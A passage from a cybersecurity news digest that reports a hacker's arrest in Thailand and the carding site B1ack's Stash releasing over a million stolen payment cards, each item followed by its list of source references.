The arrest marks a significant win in the fight against cybercrime, with authorities seizing laptops and other electronic devices during the raid in Thailand. Investigations revealed the suspect's involvement in attacks affecting multinational corporations, small businesses, and government databases across several countries, including Thailand, India, Indonesia, the UK, and the United States. The hacker allegedly worked alone, selling stolen data. The cybercriminal initially focused on Thai entities, later expanding operations across the Asia-Pacific region.
Recommended read:
References :
- gbhackers.com: Authorities Arrested Hacker Behind 90 Major Data Breaches Worldwide
- DataBreaches.Net: Criminal hacker known as ALTDOS, DESORDEN, GHOSTR and 0mid16B arrested
- CyberInsider: Cybercriminal Behind 90+ Data Leaks Arrested in Bangkok
@cyberinsider.com
//
B1ack's Stash, an illicit carding marketplace, released a dataset containing over 1 million stolen credit and debit cards on a dark web forum on February 19, 2025. Experts are warning that the release of over 1 million unique credit and debit cards by the carding website B1ack’s Stash appears to be a marketing strategy to attract new customers and gain notoriety within the cybercrime ecosystem. Other underground marketplaces like Joker Stash and BidenCash facilitate the sale of payment card data.
The cybersecurity community is on high alert. It has been reported that the leaked data includes PAN, expiration date, CVV2, cardholders' personal details, email address, IP address, and User-Agent, obtained through e-skimming. Banking institutions are being advised to monitor the dark web for the offering of credit and debit cards to prevent fraudulent activities.
Recommended read:
References :
- cyberinsider.com: On February 19, 2025, the illicit carding marketplace B1ack's Stash released a dataset containing over 1 million stolen credit and debit cards on a dark web forum.
- securityaffairs.com: Experts warn that the carding website B1ack’s Stash released a collection of over 1 million unique credit and debit cards.
- Talkback Resources: Carding website B1acks Stash released over 1 million credit and debit cards to attract customers, while underground marketplaces like Joker Stash and BidenCash facilitate the sale of payment card data, prompting banks to monitor the dark web for fraudulent activities.
- CyberInsider: On February 19, 2025, the illicit carding marketplace B1ack's Stash released a dataset containing over 1 million stolen credit and debit cards on a dark web forum.
- ciso2ciso.com: B1ack’s Stash released 1 Million credit cards
- Talkback Resources: Carding website B1acks Stash released over 1 million credit and debit cards to attract customers, while underground marketplaces like Joker Stash and BidenCash facilitate the sale of payment card data, prompting banks to monitor the dark web for fraudulent activities.
- Talkback Resources: Carding website B1acks Stash released over 1 million credit and debit cards to attract customers, while underground marketplaces like Joker Stash and BidenCash facilitate the sale of payment card data, prompting banks to monitor the dark web for fraudulent activities.
- Talkback Resources: Carding website B1acks Stash released over 1 million credit and debit cards to attract customers, while underground marketplaces like Joker Stash and BidenCash facilitate the sale of payment card data, prompting banks to monitor the dark web for fraudulent activities.
|
|
FlagThis - #Cybercrime